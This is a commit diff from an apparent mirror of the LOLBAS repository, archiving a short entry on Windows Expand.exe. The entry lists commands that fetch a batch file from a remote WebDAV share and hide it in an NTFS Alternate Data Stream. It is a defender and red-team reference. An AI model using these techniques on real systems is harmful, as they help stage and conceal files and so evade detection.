mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
24
Archive-Old-Version/OSBinaries/Expand.exe.md
Normal file
24
Archive-Old-Version/OSBinaries/Expand.exe.md
Normal file
@@ -0,0 +1,24 @@
|
||||
## Expand.exe
|
||||
* Functions: Download, Copy, Add ADS
|
||||
```
|
||||
|
||||
expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Copies source file to destination.
|
||||
|
||||
expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||
Copies source file to destination.
|
||||
|
||||
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Copies source file to destination Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
* https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Expand.exe
|
||||
* c:\windows\sysWOW64\Expand.exe
|
||||
|
||||
* Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
|
||||
|
Reference in New Issue
Block a user